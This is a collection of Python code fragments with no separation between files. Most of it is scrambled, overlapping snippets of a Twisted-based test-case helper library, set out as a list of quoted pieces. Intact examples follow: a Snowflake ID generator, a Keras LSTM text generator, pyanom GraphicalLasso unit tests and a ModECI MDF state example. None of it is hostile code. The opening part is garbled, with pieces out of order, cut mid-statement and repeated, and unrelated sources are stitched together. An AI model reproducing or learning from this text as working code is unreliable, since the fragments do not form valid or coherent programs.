If a", "token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem =", "an exception if `value` is not an instance of `expected_type`", "u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(),", "= os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME' not in", "normal users.''' if cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user", "timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True to", "path and segments, which is auto cleaned. \"\"\" segments =", "= deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a failure: %s'", "test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for", "deferred.addBoth(cb) if result: # If there is already a failure,", "reactor without stopping it. \"\"\" iterations = [False] * (count", "msg, list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first, second,", "str with unicode. \"\"\" if ( isinstance(first, text_type) and not", "for all file-system tests using a real OS account. \"\"\"", "This will do recursive calls, in case the original deferred", "'arch' if distro_name in ['centos', 'ol']: # Normalize all RHEL", "= self._teardown_errors, None if errors: raise AssertionError('Cleanup errors: %r' %", "care about it. for level in inspect.stack()[1:]: try: success_state =", "use self.patch and self.patchObject. Patch = patch _environ_user = None", "non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has", "it. \"\"\" iterations = [False] * (count - 1) iterations.append(True)", "_UnixWaker = None _SIGCHLDWaker = None from chevah.compat import (", "created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''):", "cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name,", "return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean", "'') raw_name = raw_name.replace('<bound method ', '') return raw_name.split(' ',", "checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure", "None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure =", "if len(threads) > 1: for thread in threads: thread_name =", "exit. \"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family os_version =", "which is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def", "Exception types to expect - if provided, and the the", "target, source): \"\"\" Overwrite stdlib to swap the arguments. \"\"\"", "AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return", "This should only be called at cleanup as it removes", "only_marked=False): \"\"\" Clean all test files from folder_segments. 
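When the test suite runs as super user, the super filesystem avatar
is used for cleaning.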
Return a", "isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a failure.') def assertIsNotFailure(self,", "continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True)", "a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has", "testing. \"\"\" self._timeout_reached = False # Set up timeout. self._reactor_timeout_call", "1: t2 = 0.1 t = reactor.running and t2 reactor.doIteration(t)", "\"\"\" if not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError):", "cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self,", "[] else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread", "is optional. _SocketWaker = None _UnixWaker = None _SIGCHLDWaker =", "= os.getenv('TEST_LANG', 'EN') # List of partial thread names to", "result. DEFERRED_TIMEOUT = 1 # List of names for delayed", "return 'arch' if distro_name in ['centos', 'ol']: # Normalize all", "self._timeout_reached = False # Set up timeout. self._reactor_timeout_call = reactor.callLater(", "is None or t2 > 1: t2 = 0.1 t", "# Test suite should be started as root and we", "'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot',", "be automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def", "will not spin the reactor. # To not slow down", "only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX", "'-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user # Test", "exists. \"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.threads", "queues. Set run_once=True to only run the reactor once. This", "and 'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER'", "timeout=None, debug=False, prevent_stop=True): \"\"\" Run the reactor until callable returns", "if callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context:", "msg, list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second,", "noqa:cover if not msg: msg = u'First is unicode while", "first stack is the # current stack and we don't", "- 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def", "output. # Otherwise the debug messages will flood the output.", "Return `True` if is OK for thread to exist after", "def exitCleanup(self): \"\"\" To be called at the end of", "Shut up you linter. TestCase else: from unittest import TestCase", "deferred.called: deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done =", "parts = platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name ==", "def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if", "= None for i in range(2, 6): try: success =", "raise AssertionError( 'executeDelayedCalls took more than %s' % (timeout,)) def", "until callable returns `True`. 
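Usage, a minimal sketch (condition_met is a hypothetical predicate;
the callable is invoked with the reactor)::

    self.executeReactorUntil(lambda _: condition_met(), timeout=5)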
\"\"\" if timeout is None: timeout", "':Test') tests_start = class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return", "Pool, or [] when threadpool does not exists. This should", "'EN') # List of partial thread names to ignore during", "is str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if", "behaviour to run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args,", "the reactor run one more time to execute the stop", "SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success'", "(ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. # Might", "# To not slow down all the tests, we run", "= self._getDelayedCallName(delayed) is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if", "Set it to True to enter the first loop. have_callbacks", "-*- # Copyright (c) 2011 <NAME>. # See LICENSE for", "@raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" #", "at reactor shutdown for not being handled. \"\"\" deferred.addErrback(lambda failure:", "\"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper", "if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally:", "method. In most tests you would like to use `getDeferredFailure`", "re-route this code after upgrading to Twisted 13.0. result =", "folder in the default temp folder and mark it for", "raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an", "= None _UnixWaker = None _SIGCHLDWaker = None from chevah.compat", "base = platform.processor() if base == 'aarch64': return 'arm64' if", "calls, readers and writers from the reactor. This is only", "TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific code. Provides support", "if have_callbacks: continue # Look at threads queue and active", "support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it", "\"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test", "% timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do", "@classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local OS. \"\"\"", "return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if", "= mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def", "mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)", "if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def", "(path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all", "Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol =", "def fileInTemp(self, *args, **kwargs): \"\"\" Create a file in the", "for t in expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected", "canceled from the separate thread. 
# [Unrecoverable span: shuffled n-gram shingles of chevah's "TestCase used for
#  Chevah project" module — a base TestCase with cleanup-stack, patching and
#  extended assertion helpers; a TwistedTestCase that iterates the reactor,
#  runs deferreds and asserts the reactor is left clean at teardown;
#  FileSystemTestCase and OSAccountFileSystemTestCase for tests against a real
#  OS account; plus _get_os_version / _get_ci_name environment-detection
#  helpers. The original source cannot be reconstructed from the fragments
#  present.]
# --- Snowflake-style unique ID generator ---
import time


class Snowflake:
    """Pack a 64-bit ID from a 41-bit millisecond timestamp,
    a 10-bit machine id and a 12-bit per-machine serial number."""

    def __init__(self, init_serial_no=0):
        self.machine_id = 0
        self.epoch = 0
        self.serial_no = init_serial_no

    def generate(self):
        unique_id = (
            ((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22
            | (self.machine_id & 0x3FF) << 12
            | (self.serial_no & 0xFFF)
        )
        self.serial_no += 1
        return unique_id
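# A minimal usage sketch (not part of the original file): generate one ID and
# unpack its fields with the same masks and shifts used in generate().
if __name__ == "__main__":
    sf = Snowflake()
    uid = sf.generate()
    print("id           =", uid)
    print("timestamp ms =", (uid >> 22) & 0x1FFFFFFFFFF)
    print("machine id   =", (uid >> 12) & 0x3FF)
    print("serial no    =", uid & 0xFFF)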
# --- Keras character-level text generation: model, temperature sampling, generation loop ---
import keras
from keras import layers
import numpy as np

# NOTE: maxlen, chars, char_indices, text, x and y are assumed to come from the
# (elided) data-preparation step that vectorizes the corpus into one-hot windows.

# Single-layer LSTM model for next-character prediction
model = keras.models.Sequential()
model.add(layers.LSTM(128, input_shape=(maxlen, len(chars))))
model.add(layers.Dense(len(chars), activation='softmax'))

# Model compilation configuration
optimizer = keras.optimizers.RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)

# Function to sample the next character given the model's predictions
def sample(preds, temperature=1.0):
    preds = np.asarray(preds).astype('float64')
    preds = np.log(preds) / temperature
    exp_preds = np.exp(preds)
    preds = exp_preds / np.sum(exp_preds)
    probas = np.random.multinomial(1, preds, 1)
    return np.argmax(probas)

# Text-generation loop
import sys
import random

# Trains the model for 60 epochs
for epoch in range(1, 60):
    print(f'Epoch: {epoch}')
    model.fit(x, y, batch_size=128, epochs=1)
    # Selects a text seed at random
    start_index = random.randint(0, len(text) - maxlen - 1)
    generated_text = text[start_index: start_index + maxlen]
    print(f'--- Generating with seed: {generated_text} ---')
    # Tries a range of different sampling temperatures
    for temperature in [0.2, 0.5, 1.0, 1.2]:
        print(f'--- Temperature {temperature} ---')
        sys.stdout.write(generated_text)
        # Generates 400 characters, starting from the seed text
        for i in range(400):
            sampled = np.zeros((1, maxlen, len(chars)))
            for t, char in enumerate(generated_text):
                sampled[0, t, char_indices[char]] = 1.
            # Samples the next character
            preds = model.predict(sampled, verbose=0)[0]
            next_index = sample(preds, temperature)
            next_char = chars[next_index]
            generated_text += next_char
            generated_text = generated_text[1:]
            sys.stdout.write(next_char)
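# A small self-contained illustration (not in the original listing) of what the
# temperature parameter in sample() does: low temperature sharpens the
# distribution toward the most likely character, high temperature flattens it
# toward uniform. Only numpy is needed.
import numpy as np

original = np.array([0.5, 0.3, 0.15, 0.05])
for temp in [0.2, 1.0, 2.0]:
    reweighted = np.exp(np.log(original) / temp)
    reweighted /= reweighted.sum()
    print(temp, np.round(reweighted, 3))
# temp=0.2 -> ~[0.926, 0.072, 0.002, 0.000]
# temp=1.0 -> the original distribution
# temp=2.0 -> ~[0.379, 0.294, 0.208, 0.120]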
# --- Unit tests for pyanom's GraphicalLasso ---
import io
import unittest

import numpy as np


class TestGraphicalLasso(unittest.TestCase):
    """Basic test cases."""

    def _getTarget(self):
        from pyanom.structure_learning import GraphicalLasso
        return GraphicalLasso

    def _makeOne(self, *args, **kwargs):
        return self._getTarget()(*args, **kwargs)

    @classmethod
    def setUpClass(self):
        self.X_normal = np.array([
            [0.975586009, -0.745997359, -0.229331244],
            [-0.460992487, -1.304668238, -0.599247488],
            [-0.503171745, -1.308368748, -1.451411048],
            [-0.904446243, -0.287837582, 0.197153592],
            [-1.106120624, 0.243612535, 1.051237763],
            [0.371920628, 1.690566027, -0.468645532],
            [-0.861682655, 1.472544046, -0.846863556],
            [0.632918214, 1.35895507, -1.217528827],
            [0.017011646, 1.556247275, -0.149119024],
            [-1.129336215, 0.486811944, 0.012272206],
            [0.498967152, -0.530065628, -2.14011938],
            [0.402460108, -0.474465633, -0.041584595],
            [-0.847994655, -1.281269721, -0.430338406],
            [-0.583857254, 0.228815073, -1.321443286],
            [0.963425438, -1.136873938, 0.990406269],
            [-1.342349795, -0.147133485, 1.286410605],
            [-0.546153552, 0.134343445, -0.380672316],
            [-2.264867999, 0.227795362, 1.477762968],
            [0.070095074, -0.770899782, 2.100831522],
            [0.425213005, 0.796156033, 1.676164975]])
        self.X_error = np.array([
            [-0.273095586, 0.356336588, 1.595876828],
            [-0.708547003, -0.572139833, 0.858932219],
            [-1.125947228, -1.049026454, 0.35980022],
            [0.653070988, -0.052417831, 0.787284547],
            [-1.059131881, 1.621161051, -1.295306533],
            [0.499065038, -1.064179225, 1.243325767],
            [0.452740621, -0.737171777, 0.352807563],
            [0.626897927, -1.100559392, -0.905560876],
            [1.338835274, 2.083549348, -1.280796042],
            [0.264928015, 10, 2.544472412],
            [-0.754827534, -1.031919195, 1.227285333],
            [-0.774019674, 0.241245625, -0.989132941],
            [1.298381426, 0.19445334, 2.267355363],
            [1.46892843, 1.24946146, 0.322341667],
            [1.057265661, -0.846614104, -0.355396321],
            [0.810670486, -0.719804484, -0.943762163],
            [1.169028226, 0.492444331, 0.234015505],
            [-0.307091024, -1.56195639, 0.509095939],
            [0.849156845, 0.533674261, 0.069183014],
            [0.102812565, 8, 1.545239732]])

    def test_outlier_analysis_score_shape(self):
        target = self._makeOne()
        target.fit(self.X_normal)
        pred = target.outlier_analysis_score(self.X_error)
        self.assertEqual(pred.shape, (20, 3))

    def test_incorrect_feature_size(self):
        X_normal = np.array([-0.056523959, -0.881470896, -0.249935965,
                             0.186624902, -0.30183287, 2.000815584, 0.710538188,
                             0.591089702, 0.099804538, 0.114730483]).reshape(-1, 1)
        X_error = np.array([0.660985506, -1.450512173, -1.27733756, -1.420294211,
                            0.737179562, 1.481425898, -0.170147132, -1.527687346,
                            0.580282631, -3.722489636]).reshape(-1, 1)
        target = self._makeOne()
        with self.assertRaises(ValueError):
            target.fit(X_normal)

    def test_anomaly_analysis_score_shape(self):
        target = self._makeOne()
        target.fit(self.X_normal)
        pred, pmatrix = target.anomaly_analysis_score(self.X_error)
        self.assertEqual(pred.shape, (3, ))
        self.assertEqual(pmatrix.shape, (3, 3))


if __name__ == '__main__':
    unittest.main()
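# A minimal usage sketch inferred from the tests above (hypothetical driver;
# it assumes pyanom is installed and that the constructor and method names
# match what the test suite exercises — fit on normal data, then score
# error data per sample and per feature):
import numpy as np
from pyanom.structure_learning import GraphicalLasso

rng = np.random.default_rng(0)
X_normal = rng.normal(size=(20, 3))   # stand-in "normal" data
X_error = rng.normal(size=(20, 3))    # stand-in data to score

model = GraphicalLasso()
model.fit(X_normal)                                  # learn the sparse precision structure
scores = model.outlier_analysis_score(X_error)       # (n_samples, n_features) outlier scores
anomaly, pmatrix = model.anomaly_analysis_score(X_error)  # per-feature scores + (d, d) matrix
print(scores.shape, anomaly.shape, pmatrix.shape)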
[ "t += dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot", "sys.argv: verbose = True # verbose = False from modeci_mdf.utils", "matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv:", "= 2 t = 0 recorded = {} times =", "\"-run\" in sys.argv: verbose = True # verbose = False", "p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\",", "value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 *", "mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv:", "= Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id)", "import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration", "verbose = False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine", "dt = 0.01 duration = 2 t = 0 recorded", "modeci_mdf.mdf import * import sys def main(): mod = Model(id=\"States\")", "s = [] while t <= duration: times.append(t) print(\"====== Evaluating", "variables \"\"\" from modeci_mdf.mdf import * import sys def main():", "% mod.id) if \"-run\" in sys.argv: verbose = True #", "value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id)", "/ period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\")", "of this doesn't fail on Windows on GitHub Actions )", "s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in sys.argv: import", "sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes", "state variables \"\"\" from modeci_mdf.mdf import * import sys def", "duration: times.append(t) print(\"====== Evaluating at t = %s ======\" %", "s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False,", "if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\",", "default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2 =", "increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine", "replace with initialize? 
else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if", "= Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level /", "mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\"", "= OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\"", "= Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node", "= Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\")", "EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration =", "level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp *", "in sys.argv: verbose = True # verbose = False from", "from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg", "+ increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ##", "verbose) dt = 0.01 duration = 2 t = 0", "(t)) if t == 0: eg.evaluate() # replace with initialize?", "s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\"", "= %s ======\" % (t)) if t == 0: eg.evaluate()", "t == 0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt)", "import * import sys def main(): mod = Model(id=\"States\") mod_graph", "eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in sys.argv:", "sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter(", "times = [] s = [] while t <= duration:", "## Sine node... 
sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4))", "t <= duration: times.append(t) print(\"====== Evaluating at t = %s", "Testing state variables \"\"\" from modeci_mdf.mdf import * import sys", "## Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1)", "= Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\",", "from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt =", "modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg =", "\"-nogui\" not in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s)", "plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\",", "Windows on GitHub Actions ) return mod_graph if __name__ ==", "% mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in", "False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph", "2 t = 0 recorded = {} times = []", ") sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185", "level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file =", "in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if", "\"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True,", "only_warn_on_fail=True, # Makes sure test of this doesn't fail on", "if t == 0: eg.evaluate() # replace with initialize? else:", "[] while t <= duration: times.append(t) print(\"====== Evaluating at t", "sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file", "mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" %", "= OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node =", "0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t", "value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... 
sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\",", "doesn't fail on Windows on GitHub Actions ) return mod_graph", "* level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp", "sys def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph)", "[] s = [] while t <= duration: times.append(t) print(\"======", "while t <= duration: times.append(t) print(\"====== Evaluating at t =", "* level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file", "plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\",", "plt.show() if \"-graph\" in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3,", "# Makes sure test of this doesn't fail on Windows", "- Testing state variables \"\"\" from modeci_mdf.mdf import * import", "% (t)) if t == 0: eg.evaluate() # replace with", "Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1)", "level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this doesn't", "new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose", "sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 *", "= [] s = [] while t <= duration: times.append(t)", "* 6.283185 * level / period\", ) sine_node.parameters.append(s2) op1 =", "eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t +=", "0.01 duration = 2 t = 0 recorded = {}", "on GitHub Actions ) return mod_graph if __name__ == \"__main__\":", "period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 *", "* rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\",", "Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\",", "import load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph,", "Evaluating at t = %s ======\" % (t)) if t", "= {} times = [] s = [] while t", "op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file =", "in sys.argv: mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, #", "value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1", "t = 0 recorded = {} times = [] s", "view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this", "= mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose =", "OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" %", "def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ##", "Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") 
counter_node.parameters.append(p2)", "with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\"", "* import sys def main(): mod = Model(id=\"States\") mod_graph =", "this doesn't fail on Windows on GitHub Actions ) return", "Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1 =", "0 recorded = {} times = [] s = []", "main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter", "print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt", "Makes sure test of this doesn't fail on Windows on", "from modeci_mdf.mdf import * import sys def main(): mod =", "Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node =", "counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count + increment\") counter_node.parameters.append(p2) op1 =", "mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\")", "dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot as plt", "mod.to_graph_image( engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure", "mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\",", "mod.id) if \"-run\" in sys.argv: verbose = True # verbose", "import sys def main(): mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\")", "mod.to_yaml_file(\"%s.yaml\" % mod.id) if \"-run\" in sys.argv: verbose = True", "period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1)", "= True # verbose = False from modeci_mdf.utils import load_mdf,", "at t = %s ======\" % (t)) if t ==", "\"\"\" Example of ModECI MDF - Testing state variables \"\"\"", "Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1)", "Counter node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1)", "= [] while t <= duration: times.append(t) print(\"====== Evaluating at", "not in sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show()", "True # verbose = False from modeci_mdf.utils import load_mdf, print_summary", "MDF - Testing state variables \"\"\" from modeci_mdf.mdf import *", "= mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id) if", "= False from modeci_mdf.utils import load_mdf, print_summary from modeci_mdf.execution_engine import", "= EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2 t", "mod_graph.nodes.append(counter_node) ## Sine node... sine_node = 